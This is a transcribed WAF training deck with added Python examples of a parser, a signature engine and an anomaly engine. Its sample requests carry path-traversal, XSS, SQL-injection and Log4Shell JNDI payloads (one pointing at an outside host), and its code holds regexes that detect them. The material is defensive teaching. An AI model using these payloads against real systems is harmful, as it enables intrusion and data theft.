The WAF book (Web App Firewall)

  1. 70295 © "Man's biggest obstacle is he himself" (LR)
  2. Practical Defensive Security for Security Engineers: Web App Firewall. By: Lior Rotkovitch. Ref: 052921DSMM-TWB-HB-V1.P, SOT:S,B. Comply to
  3. About: Lior Rotkovitch
     1. High tech since 1994: QA, IT, pre-sales security, security consulting
     2. New Product Introduction (NPI) for F5 ASM WAF since 2006
     3. F5 SIRT, Sr. Security Engineer since 2016: PSIRT, CSIRT
     4. Content developer since 2000
     5. Community projects: SIRT.club (promoting defensive security); gohitech (leveraging high-tech culture)
     ▪ Email: lior.rotkovitch@gmail.com ▪ Twitter: @rotkovitch ▪ LinkedIn: Lior Rotkovitch ▪ Instagram: L.Rotkovitch
  4. Agenda: 1) Target 2) Attack 3) Security 4) Policy 5) Incidents 6) Architecture 7) Operations 8) Security management 9) Assessment 10) SIRT
     Comply: learning objectives
     • Understand the ecosystem: 1, 2, 3
     • Applying security value: 4
     • When under attack: 5
     • Security design: 6
     • WAF software sustaining: 7
     • Security operations: 8
     • Evaluating a WAF: 9
     • Who is doing what: 10
  5. Web Application: the business enabler
  6. Web app paradigm: clients on THE WEB open a TCP/IP connection to the web application and exchange HTTP requests and responses.
     • Request: protocols, payload (headers), user input
     • Response: protocols, payload (headers), app output
  7. Web app ecosystem, classic: PC / browser clients → Internet → router → firewall → WAF → ADC → web server/s → application server/s → database server/s (3-tier model, perimeter model). Hosted in the data center, on premises / appliance; OPS run it, DEV build it.
  8. Web app ecosystem, modern (DEV.SEC.OPS): valuable users, mobile users, partners, ads / 3rd-party services, unknown users and web bots (automated traffic) reach the Internet edge, the perimeter / ingress (WAF NG) and the abstraction layer/s (app mesh) in front of the application/s, request handler/s, AAA, mobile app / {API} and database/s. The application runs in private / public cloud (zone X) as microservices, containers and pods deployed through CI/CD by DEVOPS; SIEM and analytics collect from the edge, with SIRT next to DEV and OPS.
  9. Application location: on-prem (dedicated / shared) or cloud (public / private, hybrid, multi-cloud), on top of virtualization / OS / hardware; in both cases the web server, app server and database server live in the data center or the cloud.
  10. Classic vs modern
     • Classic: monolith; web server, app server and database server across zone 1 and zone 2
     • Modern: mesh app, microservices (login, ID, browse, cart, pay, CP mgmt, data storage, DB) behind a request / response manager, plus 3rd-party services
     • Monomesh: classic and modern side by side
  11. API use cases: browser, mobile app / {API}, CLI and web-app admin talk to the abstraction layer/s, application/s, request handler/s, AAA and database/s over APIs carrying {JSON} or [text]; API types: data-plane API, control-plane API, integration API, deploy API, reporting API, analytics; the input travels as query string / POST data [QS/PD].
  12. Site map (app tree): the URLs, objects, {API} endpoints and microservices (MS) of the application, each with its query-string / POST-data [QS/PD] parameters.
  13. HTTP client types
     • Devices: PC, laptop, tablet, mobile, IoT
     • OS: Windows, Linux, Mac, Android, containers
     • HTTP software: browser, CLI tool, frameworks, scripting, mobile app
     • Networking, exit points: ISP, proxies, VPN, Tor, clouds
     • Networking media: wire → router, WiFi → router, mobile data
  14. Expected traffic footprint (status: online; performance: ideal)
     Top source IPs (three aggregate columns as printed on the slide, unlabelled):
       Aggregated       21.21k  23.57  36.72k
       172.29.46.46      2.75k   3.05   4.08k
       192.168.1.14      2.26k   2.51   5.27k
       192.168.190.191   2.25k   2.50   3.10k
       10.10.1.200       2.23k   2.48   4.64k
       10.0.0.138        2.01k   2.23   2.82k
     Top URLs, average RPS: / 21.21k; /search.php 2.75k; /login.php 2.26k; /sell.php 2.25k; /user_login.php 2.23k; /forgot_pass 2.01k
     Load: CPU 70% (cores 0/1/2); memory 72% (80 GB); throughput 35% (11.7 Mbps); RPS 25% (10k)
     Sample request: GET /query.php HTTP/1.1 / Connection: Keep-Alive / Host: sirt.club / User-Agent: browser (Java/1.8.0_221)
  15. Hacking for fun and profit, all the time
  16. Attack status brief
     • Type: random, targeted
     • Motivation: fame, fun and profit, "just because they can", the new war battlefield
     • Execution: vulnerability hunting, DDoS, brute force, malware, botnets, automation, more...
  17. Attack elements, spread over HTTP, web servers, app servers and the database: "An attack occurs when an attack agent sends an exploit to execute the vulnerability that resides in the attack surface."
  18. Vulnerability: a software condition (bug) with a security implication that creates a risk to the application assets; the root-cause security bug. Examples: code, configuration, design, no ATF enforcement. Main reasons: validation, functionality, limitations.
  19. Attack surface: the place where the vulnerability exists; also the entry point for the exploit, the meeting place between the exploit and the vulnerability. Examples: 1. code (function, library, URL, parameter); 2. infrastructure (OS, servers, virtualization, keys); 3. system (hardware, network, devices).
  20. Attack agent: the software vehicle (request generator tool) used to send the exploit to the attack surface. Software types: CLI, browser automation, client framework. Operates from clouds, mobiles, PCs / tablets, IoT.
  21. Exploit: the code / pattern that activates the vulnerability and allows its exploitation. Exploit types: POC exploit; exploitation exploit; weaponized exploit (RCE).
  22. Attack vector: the attack technique and / or goal. The same attack elements serve every attack; the vector is the technique used to reach the goal.
     • Goals: deny service / impact performance (DoS); extract data from the DB (SQLi); session stealing (XSS); account takeover (brute force)
     • Techniques: DoS (floods, load), SQLi, XSS, brute force, etc.
  23. Threat landscape, traditional: users / HTTP clients on one side, the app owner's web server, app server and database server on the other; the web application is the hacker's playground for web exploits: SQL injection, directory traversal, cross-site attacks.
  24. Threat landscape, modern: users, mobile users, remote employees, partners, DEVOPS, ads / 3rd-party services and allowed automated traffic (web bots) all reach the abstraction layer, application/s, request handler/s, authorization, mobile app / API and database/s, with SIEM and analytics behind them. The insider (DEV, OPS, SEC), the hacked host and the purpose-built botnet make automation the battlefield (e.g. obfuscated lookup fragments such as ${{:-}j).
  25. Attack automation (AUTO)
     • Attack agent automation = bot / botnet (bot = attack-element automation)
     • Exploit automation = scanner
     • Attack surface automation = scanner
     • Vulnerability automation = vulnerability hunting
  26. Attack automation: botnet, distributed. A bot master draws from an exploit pool and drives purpose-built, hacked and infected bots, rotating them across apps A, B, C and D at sites 1, 2 and 3.
  27. AMO, Attack Modus Operandi
     • Firepower, scheduler, parsing results
     • Exit points: ISP, VPN, Tor, proxy; geolocations, random, morphing
     • Agents: infected, hacked, purpose-built; impersonating, multi-purpose, evasions
     • Nets: botnet, hive net, swarm net (attack vectors: CAV); layers: IP, HTTP, E
  28. Summary: attack surface/s, vulnerabilities, exploit, attack agent and attack automation (AUTO) against the web application.
     • Web exploits: SQLi, XSS, LFI / RFI, RCE, CSRF
     • ATO: BF (brute force), CS (credential stuffing), PS (password spraying)
     • DDoS: floods, loads
     • Bot/s, botnet/s
  29. Attack traffic footprint. Attack elements: vulnerability, attack surface, attack agent, exploit, attack vector, attack automation.
     Top URLs, average RPS: / 21.21k; /search.php 2.75k; /login.php 2.26k; /sell.php 2.25k; /user_login.php 2.23k; /noneexisting 2.01k
     Sample request: GET /search.php?q=../../../../../../etc/passwd HTTP/1.1 / Host: sirt.club / Connection: keep-alive / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54
  30. "Security is only as good as the arsenal you have at your disposal"
  31. WAF, Web App Firewall: the security force between the HTTP clients and the web application (and its CI/CD), with three verdicts: ❑ Allow ❑ Monitor ❑ Block. Its job is D&P: detect & prevent.
  32. WAF architecture, between the web clients and the web application, operated by the security engineer:
     1. Data plane: the engines (parser engine, traps engine, enforcer engine)
     2. Control plane: settings
     3. Reporting: visualization
  33. Request engine phases in the WAF: parser → traps → enforcer → web application.
     Parser (entities / values): verb (method) GET; protocol HTTP 1.1; URL /index.php; User-Agent Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240); source IP 192.168.1.1; time 01:32:44
     Traps (detections), User-Agent signatures: Python-urllib/2.6; Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240); Mozilla/4.0 (Hydra)
     Enforcer (prevention action): alarm, block page, reset connection
     Request: GET / HTTP/1.1 / Host: sirt.club / User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240)
  34. Parser engine results for https://sirt.club/home/search.php?q=waf&cat=all
     URL entities: protocol https; host sirt.club; path /home/; object search.php; query string ?; parameter name q, value waf; 2nd parameter name cat, value all
  35. POST request parsing: headers and POST data entities, https://sirt.club/login.php
     Request: POST /login.php HTTP/1.1 / Host: www.sirt.club / Connection: keep-alive / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 / Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/* / Accept-Encoding: gzip, deflate / Content-Type: application/x-www-form-urlencoded / Content-Length: 22 / Accept-Language: en-US,en;q=0.9,he;q=0.8 / Cookie: SESSION=2a59508d7509c6d2c21bbf5b / body: uname=meme&pass=god123
     Entities: host sirt.club; method POST; HTTP version 1.1; URL login.php; Content-Length 22 (the 22-byte body; the slide printed 32); Content-Type application/x-www-form-urlencoded; param 1 uname, value meme; param 2 pass, value god123
  36. HTTP response parser: the response's protocol, payload (headers) and server output (body) are split into entities.
     Response: HTTP/1.1 200 OK / Date: Sat, 08 Jan 2022 13:53:00 GMT / Server: Apache / X-Powered-By: PHP/7.4.26 / Cache-Control: no-cache, must-revalidate, max-age=0 / Connection: Keep-Alive / Vary: Accept-Encoding / Content-Encoding: gzip / Content-Length: 8326 / Keep-Alive: timeout=5 / Content-Type: text/html; charset=UTF-8, followed by the HTML body (<html lang="en"> <head> <meta http-equiv="X-UA-Compatible" content="IE=Edge"/> <meta charset="UTF-8" /> <title>SIRT Club: Security Incident Response Teams Club</title> <script type="text/javascript"> </script> </head> <body> <div id="logo"> <p> Text </p> </body> </html>)
     Entities: status code HTTP/1.1 200 OK; headers Date, Server, X-Powered-By, Cache-Control, Keep-Alive, Connection, Content-Type, Content-Length; response body <HTML> <HEAD> <TITLE></TITLE> </HEAD> <Body> <p>SIRT protectors of the realm</p> </Body> </HTML>
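The parser slides above (34 to 36) show the entities but not how they are produced. The following is an added example written for this page, not code from the deck or from any vendor's parser engine: it splits a raw request into the entities the slides list (method, protocol, host, path and object, query-string and POST-data parameters, headers, cookies) and a raw response into status line, headers and body. The field names, the JSON flattening and the sample traffic (constructed from the slides' examples) are my own choices; the two Content-Length values are computed for the constructed bodies.

```python
"""Added example: a minimal WAF parser engine producing the entities the
deck's parser slides describe.  Illustrative code written for this page,
not a vendor's parser; field and function names are my own."""
import json
from urllib.parse import urlsplit, parse_qsl


def _split_headers(lines):
    # Keep headers as an ordered list so duplicates (e.g. two Host headers)
    # survive for the restriction checks that run later.
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def parse_request(raw: str) -> dict:
    """Parse a raw HTTP request into WAF entities.  Parameter values are kept
    exactly as sent; decoding and normalisation are the detection engines' job."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = _split_headers(lines[1:])
    hdr = {n.lower(): v for n, v in headers}
    url = urlsplit(target)
    path, _, obj = url.path.rpartition("/")          # "/home/search.php" -> "/home", "search.php"
    params = parse_qsl(url.query, keep_blank_values=True)
    ctype = hdr.get("content-type", "")
    if body and ctype.startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body, keep_blank_values=True)
    elif body and ctype.startswith("application/json"):
        # Flatten the top level of a JSON document into name/value pairs.
        params += [(k, v if isinstance(v, str) else json.dumps(v))
                   for k, v in json.loads(body).items()]
    cookies = {}
    for part in hdr.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return {
        "method": method, "protocol": version, "host": hdr.get("host"),
        "url": url.path, "path": path + "/", "object": obj,
        "query": url.query, "params": params, "headers": headers,
        "user_agent": hdr.get("user-agent"), "cookies": cookies, "body": body,
    }


def parse_response(raw: str) -> dict:
    """Parse a raw HTTP response into status line, headers and body entities."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    reason = parts[2] if len(parts) > 2 else ""
    return {"protocol": parts[0], "status": int(parts[1]), "reason": reason,
            "headers": _split_headers(lines[1:]), "body": body}


# Constructed sample traffic modelled on the slides' examples.
GET_REQ = ("GET /home/search.php?q=waf&cat=all HTTP/1.1\r\n"
           "Host: sirt.club\r\nUser-Agent: Mozilla/5.0\r\n\r\n")
POST_REQ = ("POST /login.php HTTP/1.1\r\nHost: www.sirt.club\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: 22\r\nCookie: SESSION=2a59508d7509c6d2c21bbf5b\r\n"
            "\r\nuname=meme&pass=god123")
RESP = ("HTTP/1.1 200 OK\r\nServer: Apache\r\nX-Powered-By: PHP/7.4.26\r\n"
        "Content-Type: text/html; charset=UTF-8\r\n\r\n"
        "<html><body><p>SIRT protectors of the realm</p></body></html>")

if __name__ == "__main__":
    for name, ent in (("GET", parse_request(GET_REQ)), ("POST", parse_request(POST_REQ))):
        print(name, {k: ent[k] for k in ("host", "path", "object", "params")})
    resp = parse_response(RESP)
    print("RESPONSE", resp["status"], resp["headers"][:2])
```

Keeping headers as an ordered list rather than a dict is deliberate: a dict would silently collapse the double Host header that the RFC restriction slide later wants to catch.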
  37. Traps → detections, applied to the parser's entities (protocol, payload, user input):
     • Signatures: pattern matching
     • Anomaly: aggregation and thresholds
     • Client interrogation: HTTP client inspection
     • Restrictions: allow / block lists
  38. Protection elements (PE): entities (protocol, payload, user input) → detections (1. signatures, 2. anomaly, 3. restrictions, 4. client interrogation) → prevention action; parser, traps and enforcer sit between the web clients and the web app.
  39. Signatures. Definition: pattern-matching engine; matches known words / keywords on entities.
     • Pros: powerful pattern-matching engine (IPS); blocks known exploits; virtual patching and leak prevention; security visibility (exportable detections)
     • Cons: false positives; management time; resource consumption
     • Attacks: web exploits, bot UAs, SQLi, XSS, LFI, RFI, command execution, predictable resource, etc.
     • Signature tiers: informational (user agents, defaults, general words); generic exploit (common web exploits); specific exploit (CVE / real known exploits)
     Signature example: GET /search.php?q=EXPLOIT HTTP/1.1 / Connection: keep-alive / Host: sirt.club / User-Agent: Mozilla/5.00
  40. Signature, informational: User-Agent signatures (Python-urllib/2.6; Apache-HttpClient/4.5.7 (Java/1.8.0_221); Mozilla/4.0 (Hydra)) matched on the parsed entities: verb GET; protocol HTTP 1.1; URL /query.php; User-Agent Apache-HttpClient/4.5.7 (Java/1.8.0_221); source IP 192.168.1.1.
     Request: GET /query.php HTTP/1.1 / Connection: Keep-Alive / Host: sirt.club / User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
  41. Signature, generic exploits, on POST data. Patterns: <scripts>alert('lala')<script>; <scripts> alert('') <script>; ' or 1 =1.
     Request: POST /submit.php HTTP/1.1 / Host: sirt.club / Connection: keep-alive / User-Agent: Mozilla/5.0 / Accept: text/html,application/,*/* / Content-Length: 142 / Cookie: SESSION=aafa5676ce60d1b33b58c0dd6de6fa87 / body: {"secret_book": 6.9, "tlv_book": [<scripts>alert('lala')<script>]}
     Entities: host sirt.club; method POST; HTTP version 1.1; URL submit.php; Connection keep-alive; User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64); Accept text/html, image/webp, */*; POST data {"my_book": 1.1, "tlv_book": [<scripts>alert('lala')<script>]}
  42. Signature, specific exploit. CVE signatures: /............winntwin.ini; ..../..../boot.ini; ${jndi:ldap://webappz.com}; and the shorter ${jndi: (the Log4Shell JNDI lookup prefix).
     Entities: verb GET; protocol HTTP 1.1; URL GUI.php${jndi:ldap://webappz.com}; User-Agent Mozilla/5.00; source IP 192.168.1.1; time 01:32:44. Prevention action: alert, block page, reset connection, in front of the web, application and database servers.
     Request: GET /GUI.php${jndi:ldap://webappz.com} HTTP/1.1 / Host: sirt.club / User-Agent: Mozilla/5.00
  43. Signature, HTTP response headers. The response of slide 36 (HTTP/1.1 200 OK / Date: Sat, 08 Jan 2022 13:53:00 GMT / Server: Apache / X-Powered-By: PHP/7.4.26 / Cache-Control: no-cache, must-revalidate, max-age=0 / Connection: Keep-Alive / Vary: Accept-Encoding / Content-Encoding: gzip / Content-Length: 8326 / Keep-Alive: timeout=5 / Content-Type: text/html; charset=UTF-8, body <p>Page Test</p>) is parsed into status line, headers and body; a response-header signature such as "Apache/2.1 (Unix) PHP/7.1.2" flags server version disclosure.
  44. Signature, HTTP response body. A body signature "Supplied argument is not a valid MySQL result resource in" matches PHP / MySQL error output leaking into the page.
     Response: HTTP/1.1 200 OK / Date: Sun, 29 May 2022 13:13:13 GMT / Server: Apache/2.1 (Unix) PHP/7.1.2 / Cache-Control: no-cache, must-revalidate, max-age=0 / Keep-Alive: timeout=15, max=99 / Connection: Keep-Alive / Content-Type: text/html
     Body: <b>Warning</b>: Supplied argument is not a valid MySQL result resource in <b>/var/htdocs/myapp/</b> on line <b>9</b> / <b>Warning</b>: Cannot add header information - headers already sent by (output started at /var/htdocs/myapp/login.php:9) in <b>/var/htdocs/myapp/</b> on line <b>18</b>
     Raw HTML in the same response: <FORM name="search" action="search.php" method="GET"> <INPUT type=HIDDEN name=""> <INPUT type="text" name="query" size=25 value=""> <INPUT TYPE=submit NAME="" VALUE="Search"> </FORM>
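Slides 39 to 44 describe signatures in three tiers on the request side and leak signatures on the response side. The following is an added example for this page, not code from the deck or any WAF vendor: a small signature engine that runs those tiers over already-parsed entities (a dict with url, params, headers, user_agent, or headers and body for a response). Signature ids, the regular expressions, the tier names and the constructed sample entities are my own; the only normalisation performed is one URL-decode of the URL and parameter values, which is enough to show why a pattern written for ../ must not be matched on the raw encoded value.

```python
"""Added example: a three-tier signature engine over parsed WAF entities.
Illustrative code for this page, not a vendor's signature set."""
import re
from urllib.parse import unquote

# (id, tier, entity the pattern is matched on, regex); patterns are my own.
REQUEST_SIGNATURES = [
    ("UA-001", "informational", "user_agent",
     r"python-urllib|apache-httpclient|nikto|hydra|\(java/"),
    ("GEN-XSS-001", "generic", "param_value",
     r"<\s*script[^>]*>|\bon\w+\s*=\s*['\"]?\s*alert\s*\("),
    ("GEN-SQLI-001", "generic", "param_value",
     r"'\s*or\s+\d+\s*=\s*\d+|\bunion\s+select\b|\bselect\b.+\bfrom\b"),
    ("GEN-LFI-001", "generic", "param_value", r"(\.\./){2,}|/etc/passwd\b"),
    ("SPEC-JNDI-001", "specific", "any_input", r"\$\{\s*jndi\s*:"),   # Log4Shell lookup
    ("SPEC-WIN-001", "specific", "param_value", r"\bboot\.ini\b|winnt.*win\.ini"),
]
RESPONSE_SIGNATURES = [
    ("RESP-HDR-001", "informational", "resp_header",
     r"^(server|x-powered-by):.*\d+\.\d+"),            # version disclosure
    ("RESP-BODY-001", "leak", "resp_body",
     r"supplied argument is not a valid mysql result resource"),
]


def _surfaces(ent: dict) -> dict:
    """Map each entity name to the strings a signature is matched against.
    URL and parameter values are URL-decoded once so that %2e%2e%2f style
    encoding does not slip past a pattern written for '../'."""
    values = [unquote(v) for _, v in ent.get("params", [])]
    headers = [f"{n}: {v}" for n, v in ent.get("headers", [])]
    return {
        "user_agent": [ent.get("user_agent") or ""],
        "param_value": values,
        "any_input": [unquote(ent.get("url", ""))] + values + headers,
        "resp_header": headers,
        "resp_body": [ent.get("body", "")],
    }


def scan(ent: dict, signatures=REQUEST_SIGNATURES) -> list:
    """Return one hit per matching signature: {id, tier, entity, match}."""
    hits, surfaces = [], _surfaces(ent)
    for sig_id, tier, entity, pattern in signatures:
        rx = re.compile(pattern, re.I)
        for text in surfaces[entity]:
            m = rx.search(text)
            if m:
                hits.append({"id": sig_id, "tier": tier, "entity": entity,
                             "match": m.group(0)})
                break   # one hit per signature is enough for a verdict
    return hits


# Constructed entities modelled on the slides' requests and responses.
NIKTO = {"url": "/", "params": [], "headers": [("Host", "sirt.club")],
         "user_agent": "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240)"}
XSS = {"url": "/submit.php", "headers": [("Host", "sirt.club")], "user_agent": "Mozilla/5.0",
       "params": [("my_book", "1.1"), ("tlv_book", "<scripts>alert('lala')<script>")]}
JNDI = {"url": "/GUI.php${jndi:ldap://webappz.com}", "params": [],
        "headers": [("Host", "sirt.club")], "user_agent": "Mozilla/5.00"}
LEAKY = {"headers": [("Server", "Apache/2.1 (Unix) PHP/7.1.2"), ("Content-Type", "text/html")],
         "body": "<b>Warning</b>: Supplied argument is not a valid MySQL result resource in"}

if __name__ == "__main__":
    for ent in (NIKTO, XSS, JNDI):
        print([h["id"] for h in scan(ent)])
    print([h["id"] for h in scan(LEAKY, RESPONSE_SIGNATURES)])
```

The informational tier (user agents) is the noisiest and is normally paired with the anomaly engine rather than blocked outright; the specific tier is where virtual patching of a published CVE lives.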
  45. Protection elements (PE) recap: entities (protocol, payload, user input) → detections (1. signatures, 2. anomaly, 3. restrictions, 4. client interrogation) → prevention action; parser, traps, enforcer.
  46. Anomaly. Definition: data-aggregation engine; measures whether a counter exceeds a defined threshold (above the threshold: attack; below: OK).
     • Pros: easy to use; effective automation detection; very effective against noisy attacks; clear indication of automation
     • Cons: needs fine tuning for each site; advanced usage needs knowledge and experience
     • Anomaly examples: requests per second (RPS); failed logins (FLI); session opening; other detections (signatures, metachars, etc.)
     • Attacks: brute force, credential stuffing, application DDoS, floods, etc.
  47. Anomaly: increase in RPS from IPs. Aggregated data per source IP (5 min / 20 min / 1 hour average):
       10.0.0.138        50    60   180
       192.168.1.1      180     0     0
       172.29.44.6      400   350  3000
       172.29.46.9      250   100  1000
       10.1.1.1        1800  1200   800
       192.168.24.24      0   100   150
     Policy limit per IP: source IP ANY @ 5 min, RPS limit min 220, max 280.
  48. Anomaly: increase in RPS on URLs. Aggregated data per URL (5 min / 20 min / 1 hour average):
       sell.php          500   600  1800
       help.php          120   100   100
       login.php        3000  6500  8000
       contact.us.php   1500  1000   800
       promo.page.php     10   100   150
     Policy limit per URL: source IP ANY @ 5 min, RPS limit min 220, max 280. (The slide's time chart of sell.php, login.php and contact.php is not reproduced.)
  49. Anomaly: increase in signature hits from an IP. Aggregated data, signature count per IP (5 min / 20 min / 1 hour):
       10.0.0.138       500   600  1800
       192.168.1.1       20    50   100
       172.29.44.6        0     1     0
       172.29.46.9        0     0     4
       10.1.1.1           4     4     4
       192.168.24.24      1     1     1
     Policy limit, signatures per IP: source IP ANY @ 5 min, max signature hits from one IP per 5 min: min 20, max 80; past 150 → shun for 12 hours.
  50. Anomaly: increase in failed logins (FLI) from IPs ("Fail Login, Try Again"). Aggregated data per IP (current FLI / 5 min, FLI / 60 min):
       10.0.0.138        60   180
       192.168.1.1        0     0
       172.29.44.6       35    40
       172.29.46.9      100  1000
       10.1.1.1        1800  3000
       192.168.24.24     10   150
     Policy limit, FLI per IP: source IP ANY @ 5 min, FLI per IP over 5 min: min 300, max 1000.
  51. Anomaly: increase in RPS per geo, aggregating IP to country (the slide title says FLI, but the columns and the limit are RPS). Aggregated data (current RPS / 10 min RPS):
       10.0.0.138      Country U     60   180
       192.168.1.1     Country X      0     0
       172.29.44.6     Country Y    350  3000
       172.29.46.9     Country W    100  1000
       10.1.1.1        Country V   1800  1800
       192.168.24.24   Country Z    100   150
     Policy limit per country: source IP: country @ 5 min, RPS limit min 300, max 1000.
  52. Anomaly, fixed vs ratio: two charts of IPs / URLs over time for App 1 comparing a fixed threshold with a ratio (relative) threshold; chart data not reproduced.
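Slides 46 to 52 show the anomaly tables and limits but not the aggregation itself. The following is an added example for this page, not code from the deck or a vendor: a sliding-window engine that counts events (requests, failed logins, signature hits) per source IP, URL or country and applies either fixed min/max limits or a ratio against a longer baseline, in the spirit of the fixed-vs-ratio slide. The policy numbers, the metric and dimension names, the reading of the slides' "min" as the alert limit and "max" as the block limit, and the shun-after-150 behaviour are my own illustrative choices.

```python
"""Added example: sliding-window anomaly engine with fixed and ratio
thresholds.  Illustrative code for this page, not a vendor's engine."""
from collections import defaultdict, deque

# (metric, dimension) -> thresholds.  Counts are per sliding window (seconds).
# "alert"/"block" are fixed limits; "ratio" compares the window count with
# the rate seen over "baseline" seconds instead of a fixed number.
POLICY = {
    ("req", "ip"):  {"window": 300, "alert": 220, "block": 280},
    ("req", "url"): {"window": 300, "alert": 1800, "block": 3000},
    ("fli", "ip"):  {"window": 300, "alert": 300, "block": 1000},   # failed logins
    ("sig", "ip"):  {"window": 300, "alert": 20, "block": 80,
                     "shun": 150, "shun_for": 12 * 3600},         # signature hits
    ("req", "geo"): {"window": 300, "baseline": 3600, "ratio": 3.0},
}


class AnomalyEngine:
    def __init__(self, policy=POLICY):
        self.policy = policy
        self.events = defaultdict(deque)   # (metric, dim, key) -> timestamps
        self.shunned = {}                  # (dim, key) -> ban expiry time

    @staticmethod
    def _trim(q, now, keep):
        while q and q[0] <= now - keep:
            q.popleft()

    def record(self, metric, dim, key, now):
        """Count one event and return ('ok'|'alert'|'block'|'shunned', count)."""
        self.events[(metric, dim, key)].append(now)
        return self.evaluate(metric, dim, key, now)

    def evaluate(self, metric, dim, key, now):
        rule = self.policy[(metric, dim)]
        q = self.events[(metric, dim, key)]
        # keep enough history for the baseline, count only the short window
        self._trim(q, now, max(rule["window"], rule.get("baseline", 0)))
        count = sum(1 for t in q if t > now - rule["window"])
        if self.shunned.get((dim, key), 0) > now:
            return "shunned", count
        if "ratio" in rule:
            # expected count in this window if traffic kept the baseline rate
            expected = len(q) * rule["window"] / rule["baseline"]
            return ("alert" if expected and count > rule["ratio"] * expected
                    else "ok"), count
        if rule.get("shun") and count >= rule["shun"]:
            self.shunned[(dim, key)] = now + rule["shun_for"]
            return "shunned", count
        if count >= rule["block"]:
            return "block", count
        if count >= rule["alert"]:
            return "alert", count
        return "ok", count


if __name__ == "__main__":
    eng = AnomalyEngine()
    # constructed burst: 100 signature hits from one IP inside five minutes
    for i in range(100):
        verdict = eng.record("sig", "ip", "10.0.0.138", 1000 + i)
    print(verdict)   # ('block', 100)
```

The ratio mode is what makes a per-country limit usable: a country that normally sends 100 requests per five minutes is flagged at 600, while a country that normally sends 2000 is not, without a separate fixed number per key.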
  53. Protection elements (PE) recap: entities (protocol, payload, user input) → detections (1. signatures, 2. anomaly, 3. restrictions, 4. client interrogation) → prevention action; parser, traps, enforcer.
  54. Restrictions. Definition: structure-restriction engine; matching against allow / block lists.
     • Pros: a powerful and granular allow / deny alerting and enforcement list; provides a schema for the ETF (expected traffic footprint); provides a schema for user-input validation; holistic security
     • Cons: needs fine tuning (false positives); needs management; blocking on the first occurrence is limited, hit count then block is best
     • Restriction examples: character sets; RFC and evasions; flow; structure
     • Attacks: SQLi, XSS, directory traversal, evasions, etc.
     Example restriction list: structure: allow; schema: block; methods: allow; RFC: block; encoding: block; protocol WebSocket: allow; protocol HTTP 1.0: block
  55. Restrictions, size (payload size policy): GET parameter value min 3 chars, max 130 chars.
     Entities: verb GET; protocol HTTP 1.1; parameter name q; parameter value longlonglong...longlonglx00nglong...long, 136 chars found (an x00 is embedded in the value); source IP 192.168.1.1; time 01:32:44
     Request: http://sirt.club/search.php?q=longlong...long (136-character value) / Host: sirt.club / User-Agent: Mozilla/5.0 / Accept: text/html,application/,*/*
  56. Restrictions, HTTP RFC. Policy (allow / deny) @ any request:
       Header with no value                    Block
       Double Host header                      Block
       HTTP verbs other than POST, GET, HEAD   Block
       Null in request                         Block
       Parameter value with '                  Block
       Protocol version 1.1                    Allow
       Protocol version 1.0                    Block
     Request: OPTIONS /search.php?q=mc'mer HTTP/1.0 / Host: SIRT.CLUB / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/237.36 / Accept: text/html,application/,*/* %00; / Host: 172.29.44.44 / Header123:
     Entities: verb OPTIONS; protocol HTTP 1.0; parameter name q, value mc'mer; Host header SIRT.CLUB and 172.29.44.44 (doubled); Header123 with no value; Accept text/html,application/,*/* %00; (null); time 11:11:11. Every line of this request violates a restriction.
  57. Restrictions, meta characters. Request: http://sirt.club/search.php?q=Mc'dogal. Entities: verb GET; protocol HTTP 1.1; session D5!8ec55996a207ed; parameter name q, value Mc'dogal; source IP 1.1.1.1; time 01:11:11.
     Metachar policy for any parameter value (character, ASCII code, URL encoding, allow / deny; the slide printed the decimal ASCII codes with a % prefix):
       #   35   %23   Allow
       $   36   %24   Allow
       %   37   %25   Allow
       &   38   %26   Allow
       '   39   %27   Deny
       /   47   %2F   Deny
       <   60   %3C   Deny
  58. Restrictions, rDNS query: is a client claiming to be a search engine really one?
     Request: GET /coffee HTTP/1.1 / Host: sirt.club / Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 / User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) / Connection: close
     The WAF asks the DNS server for the reverse (PTR) record of the source IP (x.y.z.z), checks that the FQDN belongs to the search engine, resolves that FQDN forward and checks that the IP in the answer matches the IP the request arrived from; a client at Y.Y.Y.Y sending the same User-Agent fails the match.
     Search engine FQDNs and counts per day: Google .googlebot.com 150; Bing .msn.com 160; Ask .ask.com 10
  59. HTTP response sanitation: preventing data leakage and credential spilling.
     Response: HTTP/1.1 200 OK / Date: Mon, 29 May 2023 10:10:10 GMT / Cache-Control: no-cache, must-revalidate, max-age=0 / Keep-Alive: timeout=15, max=99 / Connection: Keep-Alive / Content-Type: text/html, body: <p>/var/htdocs/myapp/</p> Credit cards numbers: <p>001001001001</p> <p>001002001003</p> <p>001006001004</p> <p>001006001771</p>
     Second response body: <p>/var/htdocs/myapp/</p> <p>user1@email1.com: 123456</p> <p>user2@email1.com: qwerty</p> <p>goduser1@email1.com: LOL123</p> <p>uadmin1@email1.com: password</p>
     Policy: pattern occurrences > 2 (credit-card numbers), pattern occurrences > 3 (credential pairs); third entry N/A.
